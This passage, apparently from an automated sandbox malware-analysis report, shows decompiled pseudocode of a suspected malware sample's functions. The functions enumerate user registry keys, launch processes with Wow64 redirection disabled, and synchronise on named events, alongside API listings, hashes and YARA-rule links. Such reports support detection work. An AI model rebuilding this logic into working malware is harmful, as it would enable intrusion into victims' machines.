								if( *_t101 != 0) {
									E012013CC(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d012090, executed
					_t81 = E01203B91( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d012090
							E01201E65(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E012013CC(_t100);
						_t98 = _a16;
					}
					E012013CC(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E012077FF(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x120a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                                                        0x01205448
                                                        0x01205451
                                                        0x01205458
                                                        0x0120545d
                                                        0x012054ca
                                                        0x012054d0
                                                        0x012054d5
                                                        0x012054dc
                                                        0x012054e3
                                                        0x012054e6
                                                        0x01205651
                                                        0x01205658
                                                        0x01205658
                                                        0x0120565d
                                                        0x0120565f
                                                        0x0120565f
                                                        0x01205668
                                                        0x01205668
                                                        0x012054ec
                                                        0x012054f1
                                                        0x012054f8
                                                        0x01205647
                                                        0x0120564a
                                                        0x00000000
                                                        0x0120564a
                                                        0x012054fe
                                                        0x01205503
                                                        0x01205506
                                                        0x0120550d
                                                        0x01205510
                                                        0x01205559
                                                        0x01205559
                                                        0x0120556c
                                                        0x0120556f
                                                        0x01205576
                                                        0x0120557e
                                                        0x01205583
                                                        0x0120558d
                                                        0x0120558d
                                                        0x01205585
                                                        0x01205585
                                                        0x01205585
                                                        0x01205585
                                                        0x012055af
                                                        0x012055b7
                                                        0x012055e5
                                                        0x012055ea
                                                        0x012055f1
                                                        0x012055f6
                                                        0x012055fa
                                                        0x0120562c
                                                        0x012055fc
                                                        0x01205609
                                                        0x0120560c
                                                        0x0120561c
                                                        0x0120561f
                                                        0x01205625
                                                        0x01205625
                                                        0x012055b9
                                                        0x012055c6
                                                        0x012055c9
                                                        0x012055db
                                                        0x012055de
                                                        0x012055de
                                                        0x01205636
                                                        0x01205642
                                                        0x01205638
                                                        0x0120563b
                                                        0x0120563b
                                                        0x01205636
                                                        0x012055af
                                                        0x00000000
                                                        0x01205576
                                                        0x0120551f
                                                        0x01205522
                                                        0x01205529
                                                        0x0120552f
                                                        0x01205532
                                                        0x01205534
                                                        0x01205540
                                                        0x01205543
                                                        0x01205543
                                                        0x01205549
                                                        0x0120554e
                                                        0x0120554e
                                                        0x01205554
                                                        0x00000000
                                                        0x01205554
                                                        0x01205462
                                                        0x00000000
                                                        0x01205489
                                                        0x01205489
                                                        0x01205495
                                                        0x012054a8
                                                        0x012054ae
                                                        0x012054b6
                                                        0x00000000
                                                        0x012054b6

                                                        APIs
                                                        • StrChrA.SHLWAPI(0120755B,0000005F,00000000,00000000,00000104), ref: 0120547B
                                                        • lstrcpy.KERNEL32(?,?), ref: 012054A8
                                                          • Part of subcall function 01203FC1: lstrlen.KERNEL32(?,00000000,05769CD0,7742C740,012035B6,05769ED5,0120454B,0120454B,?,0120454B,?,69B25F44,E8FA7DD7,00000000), ref: 01203FC8
                                                          • Part of subcall function 01203FC1: mbstowcs.NTDLL ref: 01203FF1
                                                          • Part of subcall function 01203FC1: memset.NTDLL ref: 01204003
                                                          • Part of subcall function 0120304F: lstrlenW.KERNEL32(?,?,?,01205611,3D012090,80000002,0120755B,01203E52,74666F53,4D4C4B48,01203E52,?,3D012090,80000002,0120755B,?), ref: 01203074
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        • lstrcpy.KERNEL32(?,00000000), ref: 012054CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                        • String ID: ($\
                                                        • API String ID: 3924217599-1512714803
                                                        • Opcode ID: a51436ce587964b4370b8673c3b3c9f9c30fd59450a797c86b7fe8598ab29c8b
                                                        • Instruction ID: c4d906e70f1f096d793bf86b7d3f4d438f8286e2424923119c86b2e2ad7b805d
                                                        • Opcode Fuzzy Hash: a51436ce587964b4370b8673c3b3c9f9c30fd59450a797c86b7fe8598ab29c8b
                                                        • Instruction Fuzzy Hash: DF51397112020BAFDF239F64EC48EAA7BBAEF18314F508614FA15925A3D735D925DF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120663C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 32%
                                                        			E0120663C(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E01204DA1(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x120a2d4; // 0x455d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x120b4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x120b90c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x120a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}
















                                                        0x0120663c
                                                        0x01206643
                                                        0x01206647
                                                        0x0120664c
                                                        0x01206653
                                                        0x01206656
                                                        0x01206660
                                                        0x01206665
                                                        0x01206671
                                                        0x01206678
                                                        0x01206682
                                                        0x01206682
                                                        0x0120667a
                                                        0x0120667a
                                                        0x0120667a
                                                        0x0120667a
                                                        0x01206688
                                                        0x0120668b
                                                        0x01206693
                                                        0x01206696
                                                        0x01206699
                                                        0x0120669c
                                                        0x012066a1
                                                        0x012066aa
                                                        0x012066b7
                                                        0x012066ac
                                                        0x012066b2
                                                        0x012066b2
                                                        0x012066bd
                                                        0x012066bd
                                                        0x012066c5

                                                        APIs
                                                          • Part of subcall function 01204DA1: SysAllocString.OLEAUT32(?), ref: 01204DFD
                                                          • Part of subcall function 01204DA1: SysAllocString.OLEAUT32(0070006F), ref: 01204E11
                                                          • Part of subcall function 01204DA1: SysAllocString.OLEAUT32(00000000), ref: 01204E23
                                                          • Part of subcall function 01204DA1: SysFreeString.OLEAUT32(00000000), ref: 01204E87
                                                        • memset.NTDLL ref: 01206660
                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0120669C
                                                        • GetLastError.KERNEL32 ref: 012066AC
                                                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 012066BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                        • String ID: <
                                                        • API String ID: 593937197-4251816714
                                                        • Opcode ID: 05939db0b5e3e37f4b2c2df1086f9530fa302f3e46f42deca7728ebb58de455b
                                                        • Instruction ID: 381665663b0a503b582a6ed32b312719e8503f997c5790162ec28a73703cf301
                                                        • Opcode Fuzzy Hash: 05939db0b5e3e37f4b2c2df1086f9530fa302f3e46f42deca7728ebb58de455b
                                                        • Instruction Fuzzy Hash: DF113071910219AFDB11DF69DC89BDD7BB8AB08384F008216E905E7282D7B49644CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01204BAC, Relevance: 7.6, APIs: 5, Instructions: 92synchronizationCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01204BAC(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x120a2c8; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x120a2d4; // 0x455d5a8
				_t3 = _t8 + 0x120b84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E01203D0E(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x120a2f8, 1, 0, _t30);
					E012013CC(_t30);
				}
				_t12 =  *0x120a2b4; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E01202102(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E0120663C(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E01202F12(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

















                                                        0x01204bad
                                                        0x01204bb4
                                                        0x01204bbe
                                                        0x01204bc2
                                                        0x01204bc8
                                                        0x01204bd5
                                                        0x01204bdc
                                                        0x01204be0
                                                        0x01204bf2
                                                        0x01204bf4
                                                        0x01204bf4
                                                        0x01204bf9
                                                        0x01204c00
                                                        0x01204c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x01204c0d
                                                        0x01204c14
                                                        0x00000000
                                                        0x00000000
                                                        0x01204c21
                                                        0x01204c25
                                                        0x01204c27
                                                        0x01204c2c
                                                        0x01204c2c
                                                        0x01204c34
                                                        0x01204c39
                                                        0x01204c3d
                                                        0x01204c41
                                                        0x00000000
                                                        0x00000000
                                                        0x01204c4f
                                                        0x01204c53
                                                        0x00000000
                                                        0x00000000
                                                        0x01204c53
                                                        0x00000000
                                                        0x01204c55
                                                        0x01204c55
                                                        0x01204c55
                                                        0x01204c5b
                                                        0x01204c5d
                                                        0x01204c5d
                                                        0x01204c67
                                                        0x01204c6b
                                                        0x01204c7d
                                                        0x01204c7d
                                                        0x01204c81
                                                        0x01204c87
                                                        0x01204c87
                                                        0x01204c8a
                                                        0x01204c8c
                                                        0x01204c8f
                                                        0x01204c8f
                                                        0x01204c96
                                                        0x01204c9c
                                                        0x01204c9c

                                                        APIs
                                                          • Part of subcall function 01203D0E: lstrlen.KERNEL32(E8FA7DD7,00000000,69B25F44,00000027,00000000,05769CD0,7742C740,0120454B,?,69B25F44,E8FA7DD7,00000000,?,?,?,0120454B), ref: 01203D44
                                                          • Part of subcall function 01203D0E: lstrcpy.KERNEL32(00000000,00000000), ref: 01203D68
                                                          • Part of subcall function 01203D0E: lstrcat.KERNEL32(00000000,00000000), ref: 01203D70
                                                        • CreateEventA.KERNEL32(0120A2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0120757A,?,?,?), ref: 01204BEB
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        • StrChrW.SHLWAPI(0120757A,00000020,61636F4C,00000001,00000000,?,?,00000000,?,0120757A,?,?,?), ref: 01204C1B
                                                        • WaitForSingleObject.KERNEL32(00000000,00004E20,0120757A,00000000,?,00000000,?,0120757A,?,?,?,?,?,?,?,0120519C), ref: 01204C49
                                                        • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0120757A,?,?,?), ref: 01204C77
                                                        • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0120757A,?,?,?), ref: 01204C8F
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 73268831-0
                                                        • Opcode ID: 45e6d128e4de8d7d39ea5e3f1cc7d9793e53257489fbcd13880fa1f97ce8b353
                                                        • Instruction ID: 89e0a77b8a1293bee92f1f1ada0662365399e5164f6fb70d4ee277dd28b1f5ec
                                                        • Opcode Fuzzy Hash: 45e6d128e4de8d7d39ea5e3f1cc7d9793e53257489fbcd13880fa1f97ce8b353
                                                        • Instruction Fuzzy Hash: B721D6725213536BE7336B6CA88CB5A77E9AB54750F058325FF069B1C7DB71C8404740
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012013E1, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 66%
                                                        			E012013E1(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				char* _t45;
				intOrPtr _t46;
				intOrPtr* _t47;
				char _t49;
				long _t53;
				char* _t54;
				long _t55;
				intOrPtr* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t77;

				_t71 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t71;
					_pop(_t72);
					_t73 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t73 + 0x18)), _t42, _t67, _t72, _t60, _t77);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t73 + 0x30)) = 0;
						} else {
							_t45 =  &_v24;
							_push(_t45);
							_push(1);
							_push(0); // executed
							E0120A144(); // executed
							if(_t45 != 0) {
								_v8 = 8;
							} else {
								_t46 = E01205FBC(0x1000);
								_v20 = _t46;
								if(_t46 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t49 = _v12;
											if(_t49 >= 0x1000) {
												_t49 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t73 + 0x18)), _v20, _t49,  &_v16);
											if(_t49 == 0) {
												break;
											}
											_t56 = _v24;
											 *((intOrPtr*)( *_t56 + 0x10))(_t56, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x120a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t54 =  &_v12;
												__imp__( *((intOrPtr*)(_t73 + 0x18)), _t54); // executed
												if(_t54 != 0) {
													goto L19;
												} else {
													_t55 = GetLastError();
													_v8 = _t55;
													if(_t55 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E012013CC(_v20);
											if(_v8 == 0) {
												_t53 = E01201675(_v24, _t73); // executed
												_v8 = _t53;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t47 = _v24;
								 *((intOrPtr*)( *_t47 + 8))(_t47);
							}
						}
					}
					return _v8;
				} else {
					_t59 = E0120142C(__eax); // executed
					if(_t59 != 0) {
						return _t59;
					} else {
						goto L2;
					}
				}
			}



























                                                        0x012013e2
                                                        0x012013e8
                                                        0x012013f3
                                                        0x012013f3
                                                        0x012013f5
                                                        0x01201eab
                                                        0x01201eae
                                                        0x01201eb7
                                                        0x01201eba
                                                        0x01201ebd
                                                        0x01201ec5
                                                        0x01201fc3
                                                        0x01201fce
                                                        0x01201fd1
                                                        0x01201fd3
                                                        0x00000000
                                                        0x01201fd3
                                                        0x01201ecb
                                                        0x01201ece
                                                        0x01201fd6
                                                        0x01201fd6
                                                        0x01201ed4
                                                        0x01201ed4
                                                        0x01201ed7
                                                        0x01201ed8
                                                        0x01201eda
                                                        0x01201edb
                                                        0x01201ee3
                                                        0x01201fba
                                                        0x01201ee9
                                                        0x01201eef
                                                        0x01201ef6
                                                        0x01201ef9
                                                        0x01201fa8
                                                        0x01201eff
                                                        0x00000000
                                                        0x01201eff
                                                        0x01201eff
                                                        0x01201eff
                                                        0x01201eff
                                                        0x01201f04
                                                        0x01201f06
                                                        0x01201f06
                                                        0x01201f13
                                                        0x01201f1b
                                                        0x00000000
                                                        0x00000000
                                                        0x01201f1d
                                                        0x01201f2a
                                                        0x01201f30
                                                        0x01201f30
                                                        0x01201f33
                                                        0x00000000
                                                        0x00000000
                                                        0x01201f35
                                                        0x01201f40
                                                        0x01201f54
                                                        0x01201f8a
                                                        0x01201f56
                                                        0x01201f56
                                                        0x01201f5d
                                                        0x01201f65
                                                        0x00000000
                                                        0x01201f67
                                                        0x01201f67
                                                        0x01201f72
                                                        0x01201f75
                                                        0x01201f7c
                                                        0x00000000
                                                        0x01201f7c
                                                        0x01201f75
                                                        0x01201f65
                                                        0x01201f8d
                                                        0x01201f90
                                                        0x01201f98
                                                        0x01201f9e
                                                        0x01201fa3
                                                        0x01201fa3
                                                        0x00000000
                                                        0x01201f98
                                                        0x01201f3d
                                                        0x00000000
                                                        0x01201f7f
                                                        0x01201f7f
                                                        0x00000000
                                                        0x01201f88
                                                        0x01201faf
                                                        0x01201faf
                                                        0x01201fb5
                                                        0x01201fb5
                                                        0x01201ee3
                                                        0x01201ece
                                                        0x01201fe0
                                                        0x012013ea
                                                        0x012013ea
                                                        0x012013f1
                                                        0x012013fc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x012013f1

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,01204AFA,00000000,?), ref: 01201F47
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,01204AFA,00000000,?,?), ref: 01201F67
                                                          • Part of subcall function 0120142C: wcstombs.NTDLL ref: 012014EC
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: ErrorLastObjectSingleWaitwcstombs
                                                        • String ID:
                                                        • API String ID: 2344289193-0
                                                        • Opcode ID: 0fabe744772a3677ec50d005a0fbc65b5cc76968640ea4845157d644b6acf0fc
                                                        • Instruction ID: 7c4275388f6e221b6d64c0bac812203941ccbbf4c9f3f314956452ae53bd46bf
                                                        • Opcode Fuzzy Hash: 0fabe744772a3677ec50d005a0fbc65b5cc76968640ea4845157d644b6acf0fc
                                                        • Instruction Fuzzy Hash: EB414E7092020AEFDF22DF98D9889ADBBB9FF14345F50426DE502E7192D770DA909B10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01203D85, Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01203D85(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E01205FBC(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E012013CC(_v28);
							goto L17;
						}
						_t42 = E01205448(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E012013CC(_v24);
						_v20 = _v16;
						_t47 = E01205FBC(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x120a2c4, 0) == 0x102);
				goto L16;
			}

















                                                        0x01203d85
                                                        0x01203d9f
                                                        0x01203da2
                                                        0x01203da5
                                                        0x01203da8
                                                        0x01203dab
                                                        0x01203db1
                                                        0x01203db5
                                                        0x01203e8f
                                                        0x01203e93
                                                        0x01203e93
                                                        0x01203dbe
                                                        0x01203dc5
                                                        0x01203dcc
                                                        0x01203dcf
                                                        0x01203e84
                                                        0x01203e87
                                                        0x00000000
                                                        0x01203e8d
                                                        0x01203dd5
                                                        0x01203dd8
                                                        0x01203ddf
                                                        0x01203de9
                                                        0x01203df2
                                                        0x01203df8
                                                        0x01203e00
                                                        0x01203e38
                                                        0x01203e72
                                                        0x01203e78
                                                        0x01203e7a
                                                        0x01203e7a
                                                        0x01203e7c
                                                        0x01203e7f
                                                        0x00000000
                                                        0x01203e7f
                                                        0x01203e4d
                                                        0x01203e52
                                                        0x01203e56
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01203e56
                                                        0x01203e05
                                                        0x01203e14
                                                        0x00000000
                                                        0x00000000
                                                        0x01203e19
                                                        0x01203e22
                                                        0x01203e25
                                                        0x01203e2c
                                                        0x01203e2f
                                                        0x01203e0a
                                                        0x01203e0a
                                                        0x00000000
                                                        0x01203e0a
                                                        0x01203e33
                                                        0x00000000
                                                        0x01203e33
                                                        0x01203e07
                                                        0x00000000
                                                        0x01203e58
                                                        0x01203e65
                                                        0x00000000

                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,0120755B,?), ref: 01203DAB
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • RegEnumKeyExA.KERNELBASE(?,?,?,0120755B,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,0120755B), ref: 01203DF2
                                                        • WaitForSingleObject.KERNEL32(00000000,?,?,?,0120755B,?,0120755B,?,?,?,?,?,0120755B,?), ref: 01203E5F
                                                        • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,0120755B,?,?,?,?,?,0120519C,?), ref: 01203E87
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                        • String ID:
                                                        • API String ID: 3664505660-0
                                                        • Opcode ID: 612156bd98b874a32b685c5c0fbaaf09bb686d3b9a21c64bbebc3aa313620713
                                                        • Instruction ID: c3c06d6e982ab1308007afa8b6fdefeca00856a4692a78d9399df56b8e2fe1d8
                                                        • Opcode Fuzzy Hash: 612156bd98b874a32b685c5c0fbaaf09bb686d3b9a21c64bbebc3aa313620713
                                                        • Instruction Fuzzy Hash: 96311B75D1021AAFDF23EBA9D8489EFFEB9FF44310F104266E615B2192D2744E809B90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01204C9F, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SysAllocString.OLEAUT32(80000002), ref: 01204CF6
                                                        • SysAllocString.OLEAUT32(012054F6), ref: 01204D39
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204D4D
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01204D5B
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: String$AllocFree
                                                        • String ID:
                                                        • API String ID: 344208780-0
                                                        • Opcode ID: 10eb6a5a97180364da48c4b5025228d907d59cdd7f57d04c3fa82333625ca871
                                                        • Instruction ID: 8fe8c7997944b19ab478912974246abccc51105218f5183cdfdfef7627184b6b
                                                        • Opcode Fuzzy Hash: 10eb6a5a97180364da48c4b5025228d907d59cdd7f57d04c3fa82333625ca871
                                                        • Instruction Fuzzy Hash: FA31A47181014AEFCB16EF9CD4C48AE7BB5FF48340B10862EFA0A97252D7359641CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012074CB, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 41%
                                                        			E012074CB(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E01207770(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E01203625(_t23);
						}
					}
					return _t38;
				}
				_t26 = E0120249F(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x120a2f8, 1, 0,  *0x120a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E01203D85(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E01205448(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E0120243E(_t41);
				}
